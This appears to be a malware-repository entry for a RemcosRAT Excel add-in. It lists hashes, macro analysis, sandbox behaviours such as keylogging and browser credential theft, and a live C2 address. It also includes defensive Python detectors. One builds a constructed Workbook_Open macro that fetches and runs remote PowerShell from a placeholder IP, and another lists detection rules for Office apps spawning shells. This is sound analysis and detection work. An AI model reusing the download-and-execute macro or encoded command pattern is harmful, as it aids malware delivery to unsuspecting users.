MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 5000f900d0d52fb1b6634d0437711ab10c9184d080c852f17b2fb114a35446a8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

RemcosRAT
Vendor detections: 8
Maldoc score: 11

SHA256 hash: 5000f900d0d52fb1b6634d0437711ab10c9184d080c852f17b2fb114a35446a8
SHA3-384 hash: 62c81aae67c9ac6d5ab97d24610b9db141add74e6bc200ceaf7c124742799d15fe69e467567824968ddd055312a25f01
SHA1 hash: 7bb0d46b6a36833178180c57b35c2b2bee02eb36
MD5 hash: 98d926593ca28b2b418fb4208b374c9c
humanhash: delta-kilo-carpet-uranus
File name: etat_comp_du27082021.xlam
Signature: RemcosRAT
File size: 17'815 bytes
First seen: 2021-09-01 09:27:38 UTC
Last seen: Never
File type: Excel file xlsx
MIME type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
ssdeep: 384:AKlRn4Nq7lgTXSLPu/IasgZY2esqqABF3dI2IgHgR6fQITMaXIG:AKlFRlKCLPFaO27M7I6gRTIgKIG
TLSH: T1DF82D08DC196B839DB030D3E556C96E0E208384246B792BF5C18F3377982A87934F1CA
Reporter: J_Hunt3r
Tags: DESKTOP-group remcos RemcosRAT xlsx


J_Hunt3r
Desktop_group started using Remcos again

Office OLE Information


This malware sample appears to be an Office document. The following tables provide more information about it, produced with oletools (oleid, olevba) and oledump.

OLE id
Maldoc score: 11
OLE dump

MalwareBazaar was able to identify 7 sections in this file using oledump:

Section ID  Section size  Section name
A1          435 bytes     PROJECT
A2          62 bytes      PROJECTwm
A3          977 bytes     VBA/Sheet1
A4          12458 bytes   VBA/ThisWorkbook
A5          4038 bytes    VBA/_VBA_PROJECT
A6          525 bytes     VBA/dir
OLE vba

MalwareBazaar extracted and deobfuscated the VBA script(s) in the OLE objects embedded in this file using olevba, and found the following:

Type        Keyword         Description
AutoExec    Workbook_Open   Runs when the Excel Workbook is opened
Suspicious  Open            May open a file
Suspicious  Run             May run an executable file or a system command
Suspicious  CreateObject    May create an OLE object
Suspicious  Hex Strings     Hex-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)
Suspicious  Base64 Strings  Base64-encoded strings were detected, may be used to obfuscate strings (option --decode to see all)

Intelligence


File Origin
# of uploads: 1
# of downloads: 217
Origin country: n/a
Vendor Threat Intelligence
Verdict: Legit
File type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet
Has a screenshot: False
Contains macros: True
Result
Verdict: Malware
Maliciousness:

Behaviour
Sending a UDP request
Creating a window
Creating a process with a hidden window
Sending an HTTP GET request to an infection source
Launching a process
Launching the default Windows debugger (dwwin.exe)
Connection attempt to an infection source
Launching a process by exploiting the app vulnerability
Unauthorized injection to a system process
Result
Verdict: MALICIOUS
Details
Base64 Encoded Powershell Directives
Detected one or more base64 encoded Powershell directives.
Macro with Startup Hook
Detected macro logic that will automatically execute on document open. Most malware contains some execution hook.
IPv4 Dotted Quad URL
A URL was detected referencing a direct IP address, as opposed to a domain name.
Base64 Encoded URL
Detected an ANSI or UNICODE http:// or https:// base64 encoded URL prefix.
Document With No Content
Document contains little or no semantic information.
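The three detections described above (a base64-encoded PowerShell directive, a URL with a dotted-quad host, and a base64-encoded http:// or https:// prefix in ANSI or UTF-16LE) can be reproduced with a few lines of static analysis. The script below is an added example written for this page; it is not code from MalwareBazaar, from the vendor, or from this sample. The macro text it scans is constructed, the IP address comes from the 192.0.2.0/24 documentation range, and the function names are the editor's own. The base64-prefix check is the general form of the vendor's "ANSI or UNICODE" detection: a string encoded at each of the three byte alignments yields three distinct prefixes, so the URL scheme is found even when the encoded blob does not start at it.

```python
import base64
import re


def b64_prefixes(needle: bytes) -> list[str]:
    """Base64 prefixes that `needle` produces at each of the three byte alignments.

    Only characters fully determined by the needle's own bits are kept, so the
    patterns match wherever the needle sits inside a larger encoded blob.
    """
    prefixes = []
    for k in range(3):
        enc = base64.b64encode(b"\x00" * k + needle).decode("ascii")
        start = -(-8 * k // 6)            # ceil(8k/6): first char not touched by the pad bytes
        end = 8 * (k + len(needle)) // 6  # floor: last char whose 6 bits lie inside the needle
        prefixes.append(enc[start:end])
    return prefixes


# "ANSI or UNICODE" http:// and https:// prefixes: encode each scheme as ASCII and UTF-16LE.
URL_NEEDLES = [s.encode(codec) for s in ("http://", "https://") for codec in ("ascii", "utf-16le")]
B64_URL_PREFIXES = sorted({p for n in URL_NEEDLES for p in b64_prefixes(n)}, key=len, reverse=True)

# URL whose host is a dotted quad instead of a domain name, with optional port and path.
DOTTED_QUAD_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?(?:/[^\s\"'<>)]*)?")

# powershell -e / -ec / -enc / -EncodedCommand followed by a base64 blob (UTF-16LE payload).
ENC_PS = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.IGNORECASE)


def find_b64_url_prefixes(text: str) -> list[str]:
    return [p for p in B64_URL_PREFIXES if p in text]


def find_dotted_quad_urls(text: str) -> list[str]:
    return DOTTED_QUAD_URL.findall(text)


def decode_encoded_powershell(text: str) -> list[str]:
    """Decode every -EncodedCommand argument; skip blobs that are not valid base64/UTF-16LE."""
    decoded = []
    for blob in ENC_PS.findall(text):
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            decoded.append(raw.decode("utf-16le"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded


def triage(macro_text: str) -> dict:
    """Run all three checks over the macro text and over each decoded PowerShell
    layer, since the download / C2 URL usually only appears after decoding."""
    decoded = decode_encoded_powershell(macro_text)
    layers = [macro_text] + decoded
    return {
        "b64_url_prefixes": find_b64_url_prefixes(macro_text),
        "dotted_quad_urls": sorted({u for layer in layers for u in find_dotted_quad_urls(layer)}),
        "encoded_powershell": decoded,
    }


# Constructed sample macro for demonstration; this is NOT the VBA from the entry above.
# The IP address is from the 192.0.2.0/24 documentation range.
PS_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2.ps1')"
ENCODED_PS = base64.b64encode(PS_COMMAND.encode("utf-16le")).decode("ascii")
ENCODED_URL = base64.b64encode(b"http://192.0.2.10/payload.exe").decode("ascii")
SAMPLE_MACRO = f'''
Private Sub Workbook_Open()
    Dim u As String
    u = "{ENCODED_URL}"
    Shell "powershell.exe -nop -w hidden -enc {ENCODED_PS}", vbHide
End Sub
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE_MACRO).items():
        print(f"{key}: {value}")
```

Run it on the text produced by `olevba --decode` for a real sample; the dotted-quad hit only surfaces from the decoded PowerShell layer, which is why the checks are applied to each layer rather than to the raw macro alone.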
Result
Threat name:
Detection: malicious
Classification: troj.spyw.expl.evad
Score: 100 / 100
Signature
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Detected Remcos RAT
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA with base64 encoded strings
Document exploit detected (process start blacklist hit)
Encrypted powershell cmdline option found
Found malware configuration
Injects a PE file into a foreign processes
Installs a global keyboard hook
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Encoded PowerShell Command Line
Writes to foreign memory regions
Yara detected Remcos RAT
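The two Sigma hits in the list above (an Office product spawning a Windows shell; a suspicious encoded PowerShell command line) reduce to a parent/child image check and a command-line pattern. The following is an added example of that logic run over constructed process-creation events, written for this page; it is not the Sigma rules themselves, whose parent and child image lists are broader than the simplified sets used here. The image paths, the base64 blob in the first event and the rule names are assumptions.

```python
import re

# Constructed process-creation events in Sysmon Event ID 1 style. These are NOT the
# sandbox telemetry for this sample; the paths and the base64 blob are assumptions.
EVENTS = [
    {  # what a macro like the one above produces: Excel -> hidden, encoded PowerShell
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    },
    {  # admin-run script: PowerShell, but neither an Office parent nor an encoded command
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    },
    {  # Word launching cmd.exe: shell spawn without an encoded command line
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "cmd.exe /c whoami",
    },
    {  # benign Excel child (print driver host) that the parent/child rule must not flag
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\splwow64.exe",
        "CommandLine": "splwow64.exe 12288",
    },
]

# Simplified image sets (assumption); the real Sigma rules enumerate more of each.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "msaccess.exe", "mspub.exe", "visio.exe", "onenote.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "bitsadmin.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -en, ..., -encodedcommand)
# plus the -ec alias, followed by a base64 blob; match all of those forms.
_ENC_FORMS = ["-" + "encodedcommand"[:i] for i in range(1, 15)] + ["-ec"]
ENCODED_FLAG = re.compile(
    r"(?:^|\s)(?:" + "|".join(re.escape(f) for f in _ENC_FORMS) + r")\s+[A-Za-z0-9+/]{20,}={0,2}",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name of an image path, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: dict) -> list[str]:
    """Names of the rules an event triggers; an empty list means clean."""
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    hits = []
    if parent in OFFICE_PARENTS and child in SHELL_CHILDREN:
        hits.append("office_spawning_shell")
    if child in {"powershell.exe", "pwsh.exe"} and ENCODED_FLAG.search(event["CommandLine"]):
        hits.append("encoded_powershell_cmdline")
    return hits


def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """(index, rule names) for every event that triggers at least one rule."""
    flagged = []
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            flagged.append((i, hits))
    return flagged


if __name__ == "__main__":
    for i, hits in scan(EVENTS):
        print(f"event {i}: {', '.join(hits)}  <- {EVENTS[i]['CommandLine']}")
```

The fourth event matters as much as the first: Office processes do spawn legitimate children (splwow64.exe is one), so the rule keys on the child being a shell or script host, not on Excel having a child at all. Only the first event trips both rules, which is the combination seen in this sample's sandbox run.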
Behaviour
Threat name: Script-Macro.Trojan.Amphitryon
Status: Malicious
First seen: 2021-09-01 09:28:04 UTC
AV detection: 8 of 45 (17.78%)
Threat level: 5/5
Result
Malware family:
Score: 10/10
Tags: family:remcos botnet:remotehost macro rat
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Office loads VBA resources, possible macro or embedded object present
Suspicious use of SetThreadContext
Blocklisted process makes network request
Process spawned unexpected child process
Remcos
Malware Config
C2 Extraction: toornavigator.sytes.net:35500
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Comments